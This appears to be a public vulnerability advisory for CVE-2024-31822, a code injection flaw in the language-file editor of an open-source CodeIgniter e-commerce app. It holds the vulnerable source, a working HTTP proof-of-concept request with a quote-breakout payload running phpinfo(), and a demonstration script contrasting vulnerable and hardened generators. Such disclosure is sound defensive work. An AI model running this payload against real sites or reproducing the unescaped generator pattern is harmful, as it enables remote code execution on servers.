@LioTree
Last active April 28, 2024 12:45
CVE-2024-31822

vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)

version: before commit d22b54e ("Vulnerability fixes from Lion Tree", kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e on github.com)

A code injection (CWE-94) vulnerability exists in application/modules/admin/controllers/advanced_settings/Languages.php. The saveLanguageFiles method regenerates PHP language files from form input: each element of $_POST['php_keys'] is passed through htmlentities() and written, wrapped in single quotes, as the key of a $lang array entry in a PHP source file that is later included. However, htmlentities() with its default flags does not encode the single quote (the default was ENT_COMPAT until PHP 8.1, which changed it to ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401), so an attacker can close the quoted key, append arbitrary PHP, and reopen the quote. Because the admin panel is required to reach this code path, the result is authenticated remote code execution by an admin user.

```php
private function saveLanguageFiles()
{
    $i = 0;
    $prevFile = 'none';
    $phpFileInclude = "<?php \n";
    foreach ($_POST['php_files'] as $phpFile) {
        // A change of target file flushes the lines collected so far.
        if ($phpFile != $prevFile && $i > 0) {
            savefile($prevFile, $phpFileInclude);
            $phpFileInclude = "<?php \n";
        }
        // Values: only quote characters are replaced with HTML entities.
        $php_value = str_replace("'", '&#39;', $_POST['php_values'][$i]);
        $php_value = str_replace('"', '&#34;', $php_value);
        // Keys: htmlentities() with default flags leaves the single quote
        // untouched, so the key is written into PHP source unescaped.
        $phpFileInclude .= '$lang[\'' . htmlentities($_POST['php_keys'][$i]) . '\'] = \'' . $php_value . '\';' . "\n";
        $prevFile = $phpFile;
        $i++;
    }
    savefile($phpFile, $phpFileInclude);
    ......

// Writes the generated source to disk as-is.
function savefile($file, $info)
{
    $file = fopen($file, "w");
    fwrite($file, $info);
    fclose($file);
}
```

The steps to reproduce are as follows:

```http
POST /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 39539
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english
Cookie: ci_session=s42mnne1b8qtto2hfi675l8ej6a34me2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

goDaddyGo=&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D='.phpinfo().'&php_values%5B%5D=Home&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=production&php_values%5B%5D=Production&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=pass_change&php_values%5B%5D=Pass+Change&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=security&php_values%5B%5D=Security&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=changed&php_values%5B%5D=Changed&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=change_my_password
......
```

The generated application/language/english/admin_lang.php then contains:

```php
<?php 
$lang[''.phpinfo().''] = 'Home';
$lang['production'] = 'Production';
......
```

Visit http://localhost/Ecommerce-CodeIgniter-Bootstrap/index.php/admin/languages again: the admin controller loads admin_lang.php, the key expression ''.phpinfo().'' is evaluated while the file is included, and phpinfo() is executed.
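To make the breakout concrete and to show what a safe generator looks like, the following is an added, self-contained example (not code from the project or from the gist). It reproduces the generator's line-building pattern, includes the generated file to prove the injected statement runs, and contrasts it with a version that validates keys and emits values with var_export(). The payload key, the `pwned` marker, the function names and the ENT_COMPAT flag (passed explicitly to reproduce the pre-8.1 htmlentities() default) are all assumptions of this example.

```php
<?php
// Added example, not part of kirilkirkov/Ecommerce-CodeIgniter-Bootstrap.
// Demonstrates the single-quote breakout in generated $lang[...] lines and a
// hardened generator.
declare(strict_types=1);

// Vulnerable pattern (same construction as saveLanguageFiles()).
// ENT_COMPAT is passed explicitly: it was the htmlentities() default before
// PHP 8.1 and does not encode single quotes. On PHP 8.1+ the default is
// ENT_QUOTES, which would neutralise this particular payload.
function vulnerable_line(string $key, string $value): string
{
    $value = str_replace("'", '&#39;', $value);
    $value = str_replace('"', '&#34;', $value);
    return '$lang[\'' . htmlentities($key, ENT_COMPAT) . '\'] = \'' . $value . '\';' . "\n";
}

// Hardened pattern: language keys are identifiers, so anything else is
// rejected outright; values are emitted with var_export(), which yields a
// correctly escaped PHP string literal (backslashes and single quotes too).
function safe_line(string $key, string $value): string
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $key)) {
        throw new InvalidArgumentException("invalid language key: $key");
    }
    return '$lang[' . var_export($key, true) . '] = ' . var_export($value, true) . ";\n";
}

// Writes one generated line to a temporary language file, includes it the
// way the application would, and reports whether injected code ran.
function run_generated(string $line): bool
{
    unset($GLOBALS['pwned']);
    $file = tempnam(sys_get_temp_dir(), 'lang');
    file_put_contents($file, "<?php\n" . $line);
    $lang = [];
    include $file;
    unlink($file);
    return isset($GLOBALS['pwned']);
}

// Constructed payload: closes the quoted key, runs an expression that sets a
// marker (instead of phpinfo()), and reopens the quote so the line still parses.
$payloadKey = "'.(\$GLOBALS['pwned']=1).'";

echo vulnerable_line($payloadKey, 'Home');
var_dump(run_generated(vulnerable_line($payloadKey, 'Home')));

try {
    safe_line($payloadKey, 'Home');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
echo safe_line('home', "it's 'Home'");
var_dump(run_generated(safe_line('home', "it's 'Home'")));
```

Run with `php example.php`. The vulnerable generator emits `$lang[''.($GLOBALS['pwned']=1).''] = 'Home';`, which is valid PHP, and including it sets the marker, so the first var_dump() reports true. The hardened generator refuses the payload key and emits `$lang['home'] = 'it\'s \'Home\'';` for a value containing quotes, so the second var_dump() reports false. Since the target path in the original snippet also comes from the request (`$_POST['php_files']` is handed straight to fopen()), a real fix should additionally restrict the written file to a known entry inside the language directory rather than accepting an arbitrary path.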
